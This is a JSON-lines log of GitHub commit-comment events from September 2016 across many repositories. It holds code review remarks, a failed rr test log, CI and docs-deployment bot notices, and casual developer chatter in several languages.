{"id":"4619679062","type":"CommitCommentEvent","actor":{"login":"remram44"},"repo":{"name":"ViDA-NYU/reprozip"},"payload":{"comment":{"id":19177627,"position":null,"line":null,"path":null,"commit_id":"a975488d5f496b5c6892cb842483219888d0a5f6","created_at":"2016-09-26T18:46:36Z","updated_at":"2016-09-26T18:46:36Z","body":"The `digits-sklearn-opencv` example is not actually from scikit-learn, `digits-sklearn` is.\r\n\r\nThis is where it's from: http://hanzratech.in/2015/02/24/handwritten-digit-recognition-using-opencv-sklearn-and-python.html"}},"created_at":"2016-09-26T18:46:36Z"}
{"id":"4619680778","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":19177631,"position":26,"line":26,"path":"10/index.html","commit_id":"676bed80a7cd17f9fca3f44532fb0ceb62146d89","created_at":"2016-09-26T18:46:54Z","updated_at":"2016-09-26T18:46:54Z","body":"`type=\"url\"` не подходит в данном случае, ведь будет вводится просто строка, а URL должен выглядеть как\r\n`http://site.com`"}},"created_at":"2016-09-26T18:46:54Z"}
{"id":"4619681548","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/common"},"payload":{"comment":{"id":19177634,"position":13,"line":13,"path":"go/docs/README.md","commit_id":"efab819d45728e77515ef323dd97fede3116ae1a","created_at":"2016-09-26T18:47:03Z","updated_at":"2016-09-26T18:47:03Z","body":"Nice approach :)"}},"created_at":"2016-09-26T18:47:03Z"}
{"id":"4619681976","type":"CommitCommentEvent","actor":{"login":"hebestreit"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19177639,"position":null,"line":null,"path":null,"commit_id":"7109d7409f168a3510ed89b71a1016ecdc3ac12d","created_at":"2016-09-26T18:47:08Z","updated_at":"2016-09-26T18:47:08Z","body":"Hab mal ein paar deiner Links mit aufgenommen:\r\nhttps://github.com/typearea/projectmanagement/commit/df927f1d74fc319ac13d912beaa8675efa7de275\r\n\r\nZudem mal eine andere Version ausprobiert.\r\n\r\n@tinagiesler Hast du das Logo zufällig parat?"}},"created_at":"2016-09-26T18:47:08Z"}
{"id":"4619682490","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/common"},"payload":{"comment":{"id":19177641,"position":26,"line":26,"path":"go/docs/README.md","commit_id":"efab819d45728e77515ef323dd97fede3116ae1a","created_at":"2016-09-26T18:47:13Z","updated_at":"2016-09-26T18:47:13Z","body":"period in the heading"}},"created_at":"2016-09-26T18:47:13Z"}
{"id":"4619687352","type":"CommitCommentEvent","actor":{"login":"lat9"},"repo":{"name":"lat9/dbio"},"payload":{"comment":{"id":19177653,"position":null,"line":null,"path":null,"commit_id":"2406582ebf5f01ca4e69d773db5b2e2895cf8d5d","created_at":"2016-09-26T18:48:04Z","updated_at":"2016-09-26T18:48:04Z","body":"This commit was actually in reference to issue #65."}},"created_at":"2016-09-26T18:48:04Z"}
{"id":"4619688858","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/common"},"payload":{"comment":{"id":19177656,"position":44,"line":44,"path":"go/docs/build.sh_","commit_id":"efab819d45728e77515ef323dd97fede3116ae1a","created_at":"2016-09-26T18:48:19Z","updated_at":"2016-09-26T18:48:19Z","body":"there are"}},"created_at":"2016-09-26T18:48:19Z"}
{"id":"4619689695","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19177659,"position":null,"line":null,"path":null,"commit_id":"0d78c267e994c44bd0f31735bb61e8a49ff439c9","created_at":"2016-09-26T18:48:29Z","updated_at":"2016-09-26T18:48:29Z","body":"Doubles... Always chcek log after your commits! "}},"created_at":"2016-09-26T18:48:29Z"}
{"id":"4619692765","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19177666,"position":null,"line":null,"path":null,"commit_id":"138d94262acf87c47e222e4d1efac1876fa067e8","created_at":"2016-09-26T18:49:00Z","updated_at":"2016-09-26T18:49:00Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/138d94262acf87c47e222e4d1efac1876fa067e8/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-26T18:49:00Z"}
{"id":"4619693117","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19177669,"position":null,"line":null,"path":null,"commit_id":"8a2edcb66395f803080d764476d1da965036d325","created_at":"2016-09-26T18:49:04Z","updated_at":"2016-09-26T18:49:04Z","body":"```\r\n162: /home/keno/rr-vanilla/src/test/util.sh: line 219: 18804 Aborted                 (core dumped) _RR_TRACE_DIR=\"$workdir\" rr $GLOBAL_OPTIONS replay -a $replayflags > replay.out 2> replay.err\r\n162: Test 'intr_ppoll' FAILED: : error during replay:\r\n162: --------------------------------------------------\r\n162: [FATAL /home/keno/rr-vanilla/src/ReplaySession.cc:454:check_pending_sig() errno: SUCCESS]\r\n162:  (task 18805 (rec:17612) at time 239)\r\n162:  -> Assertion `0 < t->stop_sig()' failed to hold. Replaying `SIGNAL: SIGCHLD(async)': expecting tracee signal or trap, but instead at `rt_sigprocmask' (ticks: 42902)\r\n162: [FATAL /home/keno/rr-vanilla/src/log.cc:283:emergency_debug() errno: SUCCESS] (session doesn't look interactive, aborting emergency debugging)\r\n162: --------------------------------------------------\r\n162: replay.out:\r\n162: --------------------------------------------------\r\n162: iteration 0\r\n162: --------------------------------------------------\r\n162: Test intr_ppoll failed, leaving behind /tmp/rr-test-intr_ppoll-gmeHmxhaS\r\n162: To replay the failed test, run\r\n162:   _RR_TRACE_DIR=/tmp/rr-test-intr_ppoll-gmeHmxhaS rr replay\r\n```"}},"created_at":"2016-09-26T18:49:04Z"}
{"id":"4619694053","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177670,"position":23,"line":23,"path":"client/state/states-list/reducer.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:49:11Z","updated_at":"2016-09-26T18:49:11Z","body":"`isFetching` might need to be an object of `countryCode` -> `boolean` pairs, since we'd want to be able to block duplicate requests for the _same_ country code, but allow parallel requests for _different_ country codes. As-is, we have no way to distinguish.\r\n\r\nThis will probably end up looking like other reducers where we track by site ID, like in the [page templates reducer](https://github.com/Automattic/wp-calypso/blob/a38bc4939e5eee5c7d174ebd4369a3612fa808bd/client/state/page-templates/reducer.js#L18-L36), though keyed by country code instead of site ID in this case."}},"created_at":"2016-09-26T18:49:11Z"}
{"id":"4619694891","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19177671,"position":null,"line":null,"path":null,"commit_id":"04d82d81278c564080cc116655e7ad415f90f637","created_at":"2016-09-26T18:49:19Z","updated_at":"2016-09-26T18:49:19Z","body":"```\r\nI notice a distinct lack of flickering textures in the R&C 1 demo with this commit.\r\n```\r\nOh no, hundred of reddit users will suicide :p"}},"created_at":"2016-09-26T18:49:19Z"}
{"id":"4619696642","type":"CommitCommentEvent","actor":{"login":"rohitporoli"},"repo":{"name":"Citrus-CAF/vendor_citrus"},"payload":{"comment":{"id":19177674,"position":null,"line":null,"path":null,"commit_id":"11be3814b00c853bd0be7788e899f57e7daf36ce","created_at":"2016-09-26T18:49:38Z","updated_at":"2016-09-26T18:49:38Z","body":"Why you do this!? ;_; I cry everytime :("}},"created_at":"2016-09-26T18:49:38Z"}
{"id":"4619701755","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":19177688,"position":8,"line":8,"path":"9/style.css","commit_id":"676bed80a7cd17f9fca3f44532fb0ceb62146d89","created_at":"2016-09-26T18:50:33Z","updated_at":"2016-09-26T18:50:33Z","body":"Ну вот ты указал название шрифта `Montserrat Light`"}},"created_at":"2016-09-26T18:50:33Z"}
{"id":"4619702667","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19177690,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-26T18:50:43Z","updated_at":"2016-09-26T18:50:43Z","body":"![image](https://cloud.githubusercontent.com/assets/19476407/18847521/257368da-845d-11e6-869c-26059f3a539d.png)\r\n"}},"created_at":"2016-09-26T18:50:43Z"}
{"id":"4619702830","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19177692,"position":35,"line":144,"path":"wsgi_intercept/__init__.py","commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-26T18:50:45Z","updated_at":"2016-09-26T18:50:45Z","body":"This isn't a monkey patch. All it is is setting a  global variable. Or you could it even call it global config.\r\n\r\nI initially did it as an environment variable but then realized that that was mixing media: Why would you want to set an environment variable, either from an external shell, or by setting os.environ, when you could just set a global?\r\n\r\nThe gist is that if you want this feature, you will always want this feature, so global, in Python, is fine.\r\n\r\nI explored methods of passing in through the call stack, but as you noted there are a many different ways in, and in situations where wsgi-intercept is a buried library (for instance in gabbi) it gets even more complicate. Thus, again, a global is the simple way: Set a switch that you want this feature...done."}},"created_at":"2016-09-26T18:50:45Z"}
{"id":"4619703623","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/common"},"payload":{"comment":{"id":19177694,"position":21,"line":21,"path":"go/docs/build.sh_","commit_id":"efab819d45728e77515ef323dd97fede3116ae1a","created_at":"2016-09-26T18:50:54Z","updated_at":"2016-09-26T18:50:54Z","body":"Had lately this solution which doesn't depend on \"need to be the last line\" (just a suggestion):\r\n```\r\nrelease_min=$(perl -ne '/VERSION = \"(\\d+\\.\\d+\\.\\d+).*\"$/ and print $1' version/version.go)\r\n```\r\n"}},"created_at":"2016-09-26T18:50:54Z"}
{"id":"4619704883","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19177697,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-26T18:51:05Z","updated_at":"2016-09-26T18:51:05Z","body":"![raid dragon bug](https://cloud.githubusercontent.com/assets/19476407/18847549/390eed42-845d-11e6-8dac-2819bb1a3037.jpg)\r\n"}},"created_at":"2016-09-26T18:51:05Z"}
{"id":"4619705408","type":"CommitCommentEvent","actor":{"login":"fchirigati"},"repo":{"name":"ViDA-NYU/reprozip"},"payload":{"comment":{"id":19177698,"position":null,"line":null,"path":null,"commit_id":"a975488d5f496b5c6892cb842483219888d0a5f6","created_at":"2016-09-26T18:51:08Z","updated_at":"2016-09-26T18:51:08Z","body":"Thanks for catching this.\n\nOn Mon, Sep 26, 2016 at 2:46 PM, Remi Rampin <notifications@github.com>\nwrote:\n\n> The digits-sklearn-opencv example is not actually from scikit-learn,\n> digits-sklearn is.\n>\n> This is where it's from: http://hanzratech.in/2015/02/\n> 24/handwritten-digit-recognition-using-opencv-sklearn-and-python.html\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ViDA-NYU/reprozip/commit/a975488d5f496b5c6892cb842483219888d0a5f6#commitcomment-19177627>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABYHQAsgFuFOACgskcWCH5DtkWq0bUQaks5quBMMgaJpZM4KG3NV>\n> .\n>\n\n\n\n-- \nFernando Chirigati\nResearch Assistant and Doctoral Candidate at NYU\nhttp://bigdata.poly.edu/~fchirigati/ <http://vgc.poly.edu/~fchirigati/>\n"}},"created_at":"2016-09-26T18:51:08Z"}
{"id":"4619707112","type":"CommitCommentEvent","actor":{"login":"lenards"},"repo":{"name":"iPlantCollaborativeOpenSource/clank"},"payload":{"comment":{"id":19177702,"position":28,"line":106,"path":"clank.py","commit_id":"76623ec1dd294309959875d24d4f2e9b6697c78b","created_at":"2016-09-26T18:51:24Z","updated_at":"2016-09-26T18:51:24Z","body":"🎉 "}},"created_at":"2016-09-26T18:51:24Z"}
{"id":"4619708471","type":"CommitCommentEvent","actor":{"login":"ukos-git"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19177705,"position":44,"line":91,"path":"pokemongo_bot/cell_workers/evolve_pokemon.py","commit_id":"c53a57e9a2fc43844e62c6492883b5346042e5c3","created_at":"2016-09-26T18:51:38Z","updated_at":"2016-09-26T18:51:38Z","body":"@thejamespinto you should import the appropriate functions in the beginning. Otherwise it gives an error. At least in my python.\r\nfrom datetime import datetime, timedelta"}},"created_at":"2016-09-26T18:51:38Z"}
{"id":"4619708530","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":19177706,"position":43,"line":43,"path":"9/style.css","commit_id":"676bed80a7cd17f9fca3f44532fb0ceb62146d89","created_at":"2016-09-26T18:51:39Z","updated_at":"2016-09-26T18:51:39Z","body":"а тут используешь название `montserrat-light`, почему? нужно было писать `Montserrat Light`, ты же его так назвал 38 строк ранее"}},"created_at":"2016-09-26T18:51:39Z"}
{"id":"4619708944","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19177708,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-26T18:51:44Z","updated_at":"2016-09-26T18:51:44Z","body":"@bositman \r\nPlease tell me latest git is perfect. Try to play around the place that you got a crash."}},"created_at":"2016-09-26T18:51:44Z"}
{"id":"4619709442","type":"CommitCommentEvent","actor":{"login":"Mylifeonmyway"},"repo":{"name":"Mylifeonmyway/hello-myworld"},"payload":{"comment":{"id":19177710,"position":null,"line":null,"path":null,"commit_id":"26ec40fbc654c2e3e9223aeb16397a490fad03c3","created_at":"2016-09-26T18:51:49Z","updated_at":"2016-09-26T18:51:49Z","body":"hello-world/README.md "}},"created_at":"2016-09-26T18:51:49Z"}
{"id":"4619710053","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19177711,"position":null,"line":null,"path":null,"commit_id":"0d78c267e994c44bd0f31735bb61e8a49ff439c9","created_at":"2016-09-26T18:51:56Z","updated_at":"2016-09-26T18:51:56Z","body":"I do not understand if they are new lines that are repeated.\r\nBut thanks anyway"}},"created_at":"2016-09-26T18:51:56Z"}
{"id":"4619711250","type":"CommitCommentEvent","actor":{"login":"Stanzilla"},"repo":{"name":"cmderdev/cmder"},"payload":{"comment":{"id":19177714,"position":null,"line":null,"path":null,"commit_id":"9c0ad9fd8139809f612a73d8a51d840be05794ea","created_at":"2016-09-26T18:52:08Z","updated_at":"2016-09-26T18:52:08Z","body":"@alexandr-san4ez can you please try to explain what you mean"}},"created_at":"2016-09-26T18:52:08Z"}
{"id":"4619714165","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19177722,"position":13,"line":15,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Game.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T18:52:39Z","updated_at":"2016-09-26T18:52:39Z","body":"Думаю не нужно вызывать метод start два раза."}},"created_at":"2016-09-26T18:52:39Z"}
{"id":"4619716455","type":"CommitCommentEvent","actor":{"login":"RoadDragon"},"repo":{"name":"RoadDragon/codeplayer"},"payload":{"comment":{"id":19177735,"position":null,"line":null,"path":null,"commit_id":"7dc65693e449f06eba0925d6f48e840887da02c8","created_at":"2016-09-26T18:53:04Z","updated_at":"2016-09-26T18:53:04Z","body":"This was an attempt to make buttons in the table without jQuery (with html)"}},"created_at":"2016-09-26T18:53:04Z"}
{"id":"4619717061","type":"CommitCommentEvent","actor":{"login":"samclaridge"},"repo":{"name":"NewSpring/Holtzmann"},"payload":{"comment":{"id":19177738,"position":null,"line":null,"path":null,"commit_id":"7beffe3cfc5ced30debd525ecfd7123efa876c42","created_at":"2016-09-26T18:53:10Z","updated_at":"2016-09-26T18:53:10Z","body":"@jbaxleyiii can you review this so we can use it as an example?"}},"created_at":"2016-09-26T18:53:10Z"}
{"id":"4619720049","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19177750,"position":null,"line":null,"path":null,"commit_id":"42a9eda99c902bc18a852da9d7c210360068e07c","created_at":"2016-09-26T18:53:41Z","updated_at":"2016-09-26T18:53:41Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-26T18:53:41Z"}
{"id":"4619721357","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19177752,"position":11,"line":11,"path":"blackjack/src/main/java/org/bigj/blackjack/service/GameState.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T18:53:55Z","updated_at":"2016-09-26T18:53:55Z","body":"Думаю эту строку надо убрать, так как пустой конструктор создается в Java классе по умолчанию."}},"created_at":"2016-09-26T18:53:55Z"}
{"id":"4619724014","type":"CommitCommentEvent","actor":{"login":"tomekr"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19177756,"position":4,"line":8,"path":"lib/lib/device.rb","commit_id":"734e0fed1320bc8321948dc487a41edad1774f8a","created_at":"2016-09-26T18:54:23Z","updated_at":"2016-09-26T18:54:23Z","body":"yea, this got removed at the commit after this"}},"created_at":"2016-09-26T18:54:23Z"}
{"id":"4619727366","type":"CommitCommentEvent","actor":{"login":"tomekr"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19177772,"position":56,"line":283,"path":"lib/lib/device.rb","commit_id":"734e0fed1320bc8321948dc487a41edad1774f8a","created_at":"2016-09-26T18:54:58Z","updated_at":"2016-09-26T18:54:58Z","body":"oh yea, I think it's because there is a begin block (to catch and exception of some kind) with no rescue block"}},"created_at":"2016-09-26T18:54:58Z"}
{"id":"4619727857","type":"CommitCommentEvent","actor":{"login":"rddunlap23"},"repo":{"name":"vnessified/git_excited"},"payload":{"comment":{"id":19177773,"position":null,"line":null,"path":null,"commit_id":"8ebe40e0b1553864be7d1b5bec4f7748c4a76be1","created_at":"2016-09-26T18:55:03Z","updated_at":"2016-09-26T18:55:03Z","body":"Tough crowd!!!"}},"created_at":"2016-09-26T18:55:03Z"}
{"id":"4619728447","type":"CommitCommentEvent","actor":{"login":"raa-eruanna"},"repo":{"name":"MajorCooke/zdoom"},"payload":{"comment":{"id":19177775,"position":14,"line":1425,"path":"src/r_things.cpp","commit_id":"e16be40acdcc7cff7e0eccebefda90574b0707ad","created_at":"2016-09-26T18:55:08Z","updated_at":"2016-09-26T18:55:08Z","body":"Have you tried doing this?\r\n\r\nvis->Style.Alpha = float(owner->Alpha) * alpha;"}},"created_at":"2016-09-26T18:55:08Z"}
{"id":"4619729468","type":"CommitCommentEvent","actor":{"login":"Andrettin"},"repo":{"name":"Wargus/stratagus"},"payload":{"comment":{"id":19177781,"position":null,"line":null,"path":null,"commit_id":"8b779e6e2b3cbb090d50049314f7a18cec875f87","created_at":"2016-09-26T18:55:18Z","updated_at":"2016-09-26T18:55:18Z","body":"Oh, I think it's quite alright to not include it as an option in Wargus. I meant as a preference for developers using the engine, because without the background the messages may not be as clearly visible."}},"created_at":"2016-09-26T18:55:18Z"}
{"id":"4619729814","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19177783,"position":24,"line":24,"path":"blackjack/src/main/java/org/bigj/blackjack/service/GameState.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T18:55:22Z","updated_at":"2016-09-26T18:55:22Z","body":"Формирование строки-ответа лучше всего сделать с помощью MessageFormat.format()."}},"created_at":"2016-09-26T18:55:22Z"}
{"id":"4619732581","type":"CommitCommentEvent","actor":{"login":"irl"},"repo":{"name":"Azure/azure-cli"},"payload":{"comment":{"id":19177791,"position":null,"line":null,"path":null,"commit_id":"f7876934fca1060f0fc58ac1c326957102c74737","created_at":"2016-09-26T18:55:50Z","updated_at":"2016-09-26T18:55:50Z","body":"I'm the Debian Developer repsonsible for the azure-cli package in the official Debian archives.\r\n\r\nThe debian/ directory is available at: https://anonscm.debian.org/git/pkg-azure/azure-cli.git"}},"created_at":"2016-09-26T18:55:50Z"}
{"id":"4619733789","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19177799,"position":null,"line":null,"path":null,"commit_id":"ad590415578e8e031941ca04a32550e7ed58ecec","created_at":"2016-09-26T18:56:04Z","updated_at":"2016-09-26T18:56:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#d8Ra0UJ4S4qAb159mtqEmw"}},"created_at":"2016-09-26T18:56:04Z"}
{"id":"4619733794","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19177800,"position":27,"line":27,"path":"blackjack/src/main/java/org/bigj/blackjack/service/GameState.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T18:56:04Z","updated_at":"2016-09-26T18:56:04Z","body":"Формирование строки-ответа лучше всего сделать с помощью MessageFormat.format()."}},"created_at":"2016-09-26T18:56:04Z"}
{"id":"4619734137","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177803,"position":5,"line":5,"path":"client/state/states-list/schema.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:56:07Z","updated_at":"2016-09-26T18:56:07Z","body":"To clarify, the reason we want to be as strict as possible is because if we were, for example, to change the state from `[ countryCode ]: statesList` to `[ siteId ]: statesList` (don't ask me why we'd do this 😄 ), we'd want the stale state to be discarded, but the schema here would still consider it to be valid."}},"created_at":"2016-09-26T18:56:07Z"}
{"id":"4619735022","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19177804,"position":null,"line":null,"path":null,"commit_id":"42a9eda99c902bc18a852da9d7c210360068e07c","created_at":"2016-09-26T18:56:17Z","updated_at":"2016-09-26T18:56:17Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-26T18:56:17Z"}
{"id":"4619738297","type":"CommitCommentEvent","actor":{"login":"alexyaoyang"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19177821,"position":44,"line":91,"path":"pokemongo_bot/cell_workers/evolve_pokemon.py","commit_id":"c53a57e9a2fc43844e62c6492883b5346042e5c3","created_at":"2016-09-26T18:56:51Z","updated_at":"2016-09-26T18:56:51Z","body":"I'll submit a PR"}},"created_at":"2016-09-26T18:56:51Z"}
{"id":"4619742973","type":"CommitCommentEvent","actor":{"login":"elsupergomez"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19177840,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T18:57:40Z","updated_at":"2016-09-26T18:57:40Z","body":"Block from line 167 to line 171 crash the Gtk3Test. If I comment that if block, then work fine.\r\nOn GtkTest work fine"}},"created_at":"2016-09-26T18:57:40Z"}
{"id":"4619743389","type":"CommitCommentEvent","actor":{"login":"straversi"},"repo":{"name":"beautyjoy/bjc-r"},"payload":{"comment":{"id":19177842,"position":null,"line":null,"path":null,"commit_id":"546c8254d2fc6c56ef6c2c303467d88982a55e96","created_at":"2016-09-26T18:57:45Z","updated_at":"2016-09-26T18:57:45Z","body":"Snap links are broken"}},"created_at":"2016-09-26T18:57:45Z"}
{"id":"4619744239","type":"CommitCommentEvent","actor":{"login":"ybpranawa"},"repo":{"name":"emsyaiful/PKSJ"},"payload":{"comment":{"id":19177846,"position":null,"line":null,"path":null,"commit_id":"77b17ea7d868f576567bccf6edf51bd245be1959","created_at":"2016-09-26T18:57:54Z","updated_at":"2016-09-26T18:57:54Z","body":"sing genah iki anggota siapa aja? :o "}},"created_at":"2016-09-26T18:57:54Z"}
{"id":"4619744535","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19177847,"position":39,"line":39,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Hand.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T18:57:56Z","updated_at":"2016-09-26T18:57:56Z","body":"Этот метод лучше назвать getScore"}},"created_at":"2016-09-26T18:57:56Z"}
{"id":"4619752566","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19177867,"position":null,"line":null,"path":null,"commit_id":"138d94262acf87c47e222e4d1efac1876fa067e8","created_at":"2016-09-26T18:59:22Z","updated_at":"2016-09-26T18:59:22Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/138d94262acf87c47e222e4d1efac1876fa067e8/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-26T18:59:22Z"}
{"id":"4619756648","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19177877,"position":15,"line":15,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Deck.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T19:00:06Z","updated_at":"2016-09-26T19:00:06Z","body":"В пустом конструкторе нет нужды."}},"created_at":"2016-09-26T19:00:06Z"}
{"id":"4619757391","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"oleg-gruzdev/lemon-school"},"payload":{"comment":{"id":19177880,"position":85,"line":85,"path":"10/Вариант 2/css/style.css","commit_id":"df69a270c2c44f8de12b4db1d025a4e51b1071e2","created_at":"2016-09-26T19:00:14Z","updated_at":"2016-09-26T19:00:14Z","body":"так лучше не делать, пусть весь контент лежит в HTML\r\nесли хочешь использовать псевдоэлементы с контентом, то бери контент из какого-либо `data`-атрибута"}},"created_at":"2016-09-26T19:00:14Z"}
{"id":"4619758148","type":"CommitCommentEvent","actor":{"login":"FND"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19177883,"position":35,"line":144,"path":"wsgi_intercept/__init__.py","commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-26T19:00:20Z","updated_at":"2016-09-26T19:00:20Z","body":"I do indeed consider this global configuration - and generally prefer such configuration to be external, i.e. using a separate mechanism. One such mechanism might just be dynamically loading another Python file, Flask-style (not that I'm suggesting that here), but that's still visibly different from library code.\r\n\r\nI guess my point is: You're establishing what seems like a proprietary/idiosyncratic configuration mechanism while established mechanisms already exist. Feel free to prove me wrong though by pointing at similar mechanisms within the Python community."}},"created_at":"2016-09-26T19:00:20Z"}
{"id":"4619760208","type":"CommitCommentEvent","actor":{"login":"tomekr"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19177886,"position":null,"line":null,"path":null,"commit_id":"734e0fed1320bc8321948dc487a41edad1774f8a","created_at":"2016-09-26T19:00:40Z","updated_at":"2016-09-26T19:00:40Z","body":"Yea, the only version detection is checking for the existence of the new app folder on ios9\r\n\r\nhttps://github.com/dmayer/idb/pull/73/files#diff-369d92ea2dd0384a1a14c5eaf9760ce3R69\r\n\r\nwhich is what I was going to base my 9.3.3 detection code on. Do you think there's something else we should be doing?"}},"created_at":"2016-09-26T19:00:40Z"}
